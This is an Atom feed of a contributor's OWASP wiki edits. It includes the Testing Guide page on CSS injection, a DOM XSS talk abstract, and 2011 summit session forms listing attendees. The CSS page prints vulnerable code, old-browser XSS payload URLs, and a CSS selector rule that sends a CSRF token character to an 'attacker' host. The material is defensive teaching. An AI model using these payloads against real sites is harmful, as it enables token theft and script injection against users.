<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wisec</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wisec"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Wisec"/>
		<updated>2026-04-06T13:12:01Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_CSS_Injection_(OTG-CLIENT-005)&amp;diff=236672</id>
		<title>Testing for CSS Injection (OTG-CLIENT-005)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_CSS_Injection_(OTG-CLIENT-005)&amp;diff=236672"/>
				<updated>2018-01-08T14:20:17Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: fixed broken link&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:OWASP Testing Guide v4}}&lt;br /&gt;
&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
A CSS Injection vulnerability involves the ability to inject arbitrary CSS code in the context of a trusted web site, and this will be rendered inside the victim's browser. The impact of such a vulnerability may vary on the basis of the supplied CSS payload: it could lead to Cross-Site Scripting in particular circumstances, to data exfiltration in the sense of extracting sensitive data or to UI modifications. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== How to Test == &lt;br /&gt;
Such a vulnerability occurs when the application allows to supply user-generated CSS or it is possible to somehow interfere with the legit stylesheets. Injecting code in the CSS context gives the attacker the possibility to execute JavaScript in certain conditions as well as extracting sensitive values through CSS selectors and functions able to generate HTTP requests. Actually, giving the users the possibility to customize their own personal pages by using custom CSS files results in a considerable risk, and should be definitely avoided. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following JavaScript code shows a possible vulnerable script in which the attacker is able to control the &amp;quot;location.hash&amp;quot; (source) which reaches the &amp;quot;cssText&amp;quot; function (sink). This particular case may lead to DOMXSS in older browser versions, such as Opera, Internet Explorer and Firefox; for reference see DOM XSS Wiki, section &amp;quot;Style Sinks&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;a id=&amp;quot;a1&amp;quot;&amp;gt;Click me&amp;lt;/a&amp;gt; &lt;br /&gt;
&amp;lt;script&amp;gt; &lt;br /&gt;
  if (location.hash.slice(1)) { &lt;br /&gt;
    document.getElementById(&amp;quot;a1&amp;quot;).style.cssText = &amp;quot;color: &amp;quot; + location.hash.slice(1); &lt;br /&gt;
  } &lt;br /&gt;
&amp;lt;/script&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specifically the attacker could target the victim by asking her to visit the following URLs:  &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The same vulnerability may appear in the case of classical reflected XSS in which for instance the PHP code looks like the following: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt; &lt;br /&gt;
p { &lt;br /&gt;
  color: &amp;lt;?php echo $_GET['color']; ?&amp;gt;; &lt;br /&gt;
  text-align: center; &lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/style&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Much more interesting attack scenarios involve the possibility to extract data through the adoption of pure CSS rules. Such attacks can be conducted through CSS selectors and leading for instance to grab anti-CSRF tokens, as follows. In particular, input[name=csrf_token][value=^a] represents an element with the attribute &amp;quot;name&amp;quot; set &amp;quot;csrf_token&amp;quot; and whose attribute &amp;quot;value&amp;quot; starts with &amp;quot;a&amp;quot;. By detecting the length of the attribute &amp;quot;value&amp;quot;, it is possible to carry out a brute force attack against it and send its value to the attacker's domain. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt; &lt;br /&gt;
input[name=csrf_token][value=^a] { &lt;br /&gt;
  background-image: url(http://attacker/log?a); &lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/style&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Much more modern attacks involving a combination of SVG, CSS and HTML5 have been proven feasible, therefore we recommend to see the References section for details. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Black Box testing ===&lt;br /&gt;
We are referring to client-side testing, therefore black box testing is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. However, it may happen that the user is given a certain degree of freedom in terms of possibilities to supply HTML code; in that case it is required to test whether no CSS injections are possible: tags like &amp;quot;link&amp;quot; and &amp;quot;style&amp;quot; should be disallowed, as well as attributes &amp;quot;style&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Gray Box testing === &lt;br /&gt;
'''Testing for CSS Injection vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual testing needs to be conducted and the JavaScript code analyzed in order to understand whether the attackers can inject its own content in CSS context. In particular we should be interested in how the website returns CSS rules on the basis of the inputs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following is a basic example: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;a id=&amp;quot;a1&amp;quot;&amp;gt;Click me&amp;lt;/a&amp;gt; &lt;br /&gt;
&amp;lt;b&amp;gt;Hi&amp;lt;/b&amp;gt; &lt;br /&gt;
&amp;lt;script&amp;gt; &lt;br /&gt;
  $(&amp;quot;a&amp;quot;).click(function(){ &lt;br /&gt;
    $(&amp;quot;b&amp;quot;).attr(&amp;quot;style&amp;quot;,&amp;quot;color: &amp;quot; + location.hash.slice(1)); &lt;br /&gt;
  }); &lt;br /&gt;
&amp;lt;/script&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The above code contains a source &amp;quot;location.hash&amp;quot; that is controlled by the attacker that can inject directly in the attribute &amp;quot;style&amp;quot; of an HTML element. As mentioned above, this may lead to different results on the basis of the adopted browser and the supplied payload. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It is recommended that testers use the jQuery function css(property, value) in such circumstances as follows, since this would disallow any damaging injections. In general, we recommend to use always a whitelist of allowed characters any time the input is reflected in the CSS context. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;a id=&amp;quot;a1&amp;quot;&amp;gt;Click me&amp;lt;/a&amp;gt; &lt;br /&gt;
&amp;lt;b&amp;gt;Hi&amp;lt;/b&amp;gt; &lt;br /&gt;
&amp;lt;script&amp;gt; &lt;br /&gt;
  $(&amp;quot;a&amp;quot;).click(function(){ &lt;br /&gt;
    $(&amp;quot;b&amp;quot;).css(&amp;quot;color&amp;quot;,location.hash.slice(1)); &lt;br /&gt;
  }); &lt;br /&gt;
&amp;lt;/script&amp;gt; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''OWASP Resources'''&lt;br /&gt;
* [[DOM based XSS Prevention Cheat Sheet]]&lt;br /&gt;
* DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/CssText &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Presentations'''&amp;lt;br&amp;gt;&lt;br /&gt;
* DOM Xss Identification and Exploitation, Stefano Di Paola - [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dominator/DOMXss_Identification_and_exploitation.pdf http://dominator.googlecode.com/files/DOMXss_Identification_and_exploitation.pdf] &lt;br /&gt;
* Got Your Nose! How To Steal Your Precious Data Without Using Scripts, Mario Heiderich - http://www.youtube.com/watch?v=FIQvAaZj_HA &lt;br /&gt;
* Bypassing Content-Security-Policy, Alex Kouzemtchenko - http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proof of Concepts'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Password &amp;quot;cracker&amp;quot; via CSS and HTML5 - http://html5sec.org/invalid/?length=25 &lt;br /&gt;
* CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_AppSec_DC_2012/Unraveling_some_of_the_Mysteries_around_DOMbased_XSS&amp;diff=127369</id>
		<title>OWASP AppSec DC 2012/Unraveling some of the Mysteries around DOMbased XSS</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_AppSec_DC_2012/Unraveling_some_of_the_Mysteries_around_DOMbased_XSS&amp;diff=127369"/>
				<updated>2012-04-03T13:14:21Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:OWASP AppSec DC 2012 Header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
__NOTOC__&lt;br /&gt;
== The Presentation  ==&lt;br /&gt;
DOM-based XSS was first revealed to the world back in 2005 by Amit Klien, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it's poorly understood.&amp;lt;br&amp;gt;This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review.&amp;lt;br&amp;gt;This talk will include discussion of numerous open source resources that are available on this topic. OWASP has numerous articles on DOM-based XSS, including a definition article (https://www.owasp.org/index.php/DOM_Based_XSS), an OWASP testing guide article _site_scripting_(OWASP-DV-003)), and the DOM-based XSS prevention cheat sheet eat_Sheet), and there are also other open source articles from leading researchers like Stefano Di Paola (http://code.google.com/p/domxsswiki/wiki/Introduction) as well. The speaker has already contributed to all of these OWASP articles and in preparation for this talk, plans to review and contribute additional enhancements to each of these articles in order to make the author's recommendations publically available to the web security community in a very broad manner far beyond just delivering this talk at AppSec DC. The talk will also showcase and provide worked examples of how to use open source proxy tools like OWASP ZAP (https://www.owasp.org/index.php/ZAP) and WebScarab (https://www.owasp.org/index.php/WebScarab), along with Firebug and Chrome's developer tools to track down DOM-based XSS issues within an application. The only open source DOM-based XSS detection tool, DOMinator (http://code.google.com/p/dominator/), will also be showcased in this talk.&lt;br /&gt;
== The Speakers  ==&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
===Dave Wichers===&lt;br /&gt;
[[Image:Owasp_logo_normal.jpg|left]]Bio TBA&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;noinclude&amp;gt;{{:OWASP AppSec DC 2012 Footer}}&amp;lt;/noinclude&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session043&amp;diff=103412</id>
		<title>Summit 2011 Working Sessions/Session043</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session043&amp;diff=103412"/>
				<updated>2011-02-05T08:10:13Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = Lucas C. Ferreira&lt;br /&gt;
| summit_session_attendee_email1 = lucas.ferreira@owasp.org&lt;br /&gt;
| summit_session_attendee_username1 = &lt;br /&gt;
| summit_session_attendee_company1=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = Achim Hoffmann&lt;br /&gt;
| summit_session_attendee_email2 = achim@owasp.org&lt;br /&gt;
| summit_session_attendee_username2 = Achim&lt;br /&gt;
| summit_session_attendee_company2= sic[!]sec&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = Justin Clarke&lt;br /&gt;
| summit_session_attendee_email3 = justin.clarke@owasp.org&lt;br /&gt;
| summit_session_attendee_username3 = &lt;br /&gt;
| summit_session_attendee_company3=Gotham Digital Science&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=How can we package, and/or make this easier for noobs to deploy?&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = Giorgio Fedon&lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_username4 = gfedon&lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = Abraham Kang&lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_username5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = Mario Heiderich&lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_username6 = &lt;br /&gt;
| summit_session_attendee_company6= Ruhr University Bochum / NDS&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6= Filter Evasions&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = Gareth Heyes&lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_username7 = &lt;br /&gt;
| summit_session_attendee_company7= Businessinfo&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = Eduardo Vela&lt;br /&gt;
| summit_session_attendee_email8 = evn@google.com&lt;br /&gt;
| summit_session_attendee_username8 = EduardoVela&lt;br /&gt;
| summit_session_attendee_company8= Google&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8= ACS etc..&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_username9 = Wisec&lt;br /&gt;
| summit_session_attendee_company9= Minded Security&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_username10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_username11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_username12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_username13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_username14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_username15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_username16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_username17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_username18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
| summit_session_attendee_username19 = &lt;br /&gt;
| summit_session_attendee_company19=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name20 = &lt;br /&gt;
| summit_session_attendee_email20 = &lt;br /&gt;
| summit_session_attendee_username20 = &lt;br /&gt;
| summit_session_attendee_company20=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| summit_track_logo = [[Image:T._cross_site.jpg]]&lt;br /&gt;
| summit_ws_logo = [[Image:WS._cross_site.jpg]]&lt;br /&gt;
| summit_session_name = WAF Mitigations for XSS&lt;br /&gt;
| summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session043&lt;br /&gt;
| mailing_list =&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| short_working_session_description= To discuss if/when/how web application firewalls can help to prevent XSS attacks&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| related_project_name1 = Blog post by Ryan Barnett on defending against XSS&lt;br /&gt;
| related_project_url_1 = http://blog.modsecurity.org/2010/09/advanced-topic-of-the-week-identifying-improper-output-handling-xss-flaws.html&lt;br /&gt;
&lt;br /&gt;
| related_project_name2 = Blog post by Ryan Barnett on using content injection to combat XSS&lt;br /&gt;
| related_project_url_2 = http://blog.modsecurity.org/2010/09/advanced-topic-of-the-week-xss-defense-via-content-injection.html&lt;br /&gt;
&lt;br /&gt;
| related_project_name3 = ModSecurity Demo&lt;br /&gt;
| related_project_url_3 = http://www.modsecurity.org/demo/demo-deny-noescape.html&lt;br /&gt;
&lt;br /&gt;
| related_project_name4 = &lt;br /&gt;
| related_project_url_4 = &lt;br /&gt;
&lt;br /&gt;
| related_project_name5 = &lt;br /&gt;
| related_project_url_5 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name1= Improve XSS Attack Payload Detection Techniques&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name2 = Identifying Improper Output Handling Flaws in Web Apps&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name3 = Feasibility of Profile Page Scripts/Iframes&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name4 = Testing Injection of JS Sandbox Code in Responses&lt;br /&gt;
&lt;br /&gt;
| summit_session_objective_name5 =  &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_date_and_time = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| discussion_model = participants and attendees&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_resources = Projector, whiteboards, markers, Internet connectivity, power&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| working_session_additional_details = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name1 = White paper describing “Next Generation WAF Capabilities” such as the ones described above.  Include areas requiring additional research and funding.&lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name2 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name3 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name4 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name5 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name6 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name7 = &lt;br /&gt;
&lt;br /&gt;
|summit_session_deliverable_name8 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name1 = Ryan Barnett&lt;br /&gt;
| summit_session_leader_email1 = ryan.barnett@owasp.org&lt;br /&gt;
| summit_session_leader_username1 = Rcbarnett&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name2 = &lt;br /&gt;
| summit_session_leader_email2 = &lt;br /&gt;
| summit_session_leader_username2 =&lt;br /&gt;
&lt;br /&gt;
| summit_session_leader_name3 = &lt;br /&gt;
| summit_session_leader_email3 = &lt;br /&gt;
| summit_session_leader_username3 =&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| operational_leader_name1 =&lt;br /&gt;
| operational_leader_email1 =&lt;br /&gt;
| operational_leader_username1 = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| meeting_notes = &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| session_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Session043&lt;br /&gt;
| session_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Working_Sessions/Session043&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session005&amp;diff=101834</id>
		<title>Summit 2011 Working Sessions/Session005</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session005&amp;diff=101834"/>
				<updated>2011-01-25T09:46:44Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:&amp;lt;includeonly&amp;gt;{{{1}}}&amp;lt;/includeonly&amp;gt;&amp;lt;noinclude&amp;gt;Summit 2011 Working Sessions test tab&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name1 = John Wilander&lt;br /&gt;
| summit_session_attendee_email1 = john.wilander@owasp.org&lt;br /&gt;
| summit_session_attendee_company1=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name2 = Michael Coates&lt;br /&gt;
| summit_session_attendee_email2 = &lt;br /&gt;
| summit_session_attendee_company2=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name3 = Colin Watson&lt;br /&gt;
| summit_session_attendee_email3 = &lt;br /&gt;
| summit_session_attendee_company3=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name4 = Stefano Di Paola&lt;br /&gt;
| summit_session_attendee_email4 = &lt;br /&gt;
| summit_session_attendee_company4=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name5 = &lt;br /&gt;
| summit_session_attendee_email5 = &lt;br /&gt;
| summit_session_attendee_company5=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name6 = &lt;br /&gt;
| summit_session_attendee_email6 = &lt;br /&gt;
| summit_session_attendee_company6=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name7 = &lt;br /&gt;
| summit_session_attendee_email7 = &lt;br /&gt;
| summit_session_attendee_company7=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name8 = &lt;br /&gt;
| summit_session_attendee_email8 = &lt;br /&gt;
| summit_session_attendee_company8=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name9 = &lt;br /&gt;
| summit_session_attendee_email9 = &lt;br /&gt;
| summit_session_attendee_company9=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name10 = &lt;br /&gt;
| summit_session_attendee_email10 = &lt;br /&gt;
| summit_session_attendee_company10=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name11 = &lt;br /&gt;
| summit_session_attendee_email11 = &lt;br /&gt;
| summit_session_attendee_company11=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name12 = &lt;br /&gt;
| summit_session_attendee_email12 = &lt;br /&gt;
| summit_session_attendee_company12=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name13 = &lt;br /&gt;
| summit_session_attendee_email13 = &lt;br /&gt;
| summit_session_attendee_company13=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name14 = &lt;br /&gt;
| summit_session_attendee_email14 = &lt;br /&gt;
| summit_session_attendee_company14=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= &lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name15 = &lt;br /&gt;
| summit_session_attendee_email15 = &lt;br /&gt;
| summit_session_attendee_company15=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name16 = &lt;br /&gt;
| summit_session_attendee_email16 = &lt;br /&gt;
| summit_session_attendee_company16=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name17 = &lt;br /&gt;
| summit_session_attendee_email17 = &lt;br /&gt;
| summit_session_attendee_company17=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name18 = &lt;br /&gt;
| summit_session_attendee_email18 = &lt;br /&gt;
| summit_session_attendee_company18=&lt;br /&gt;
| summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=&lt;br /&gt;
&lt;br /&gt;
| summit_session_attendee_name19 = &lt;br /&gt;
| summit_session_attendee_email19 = &lt;br /&gt;
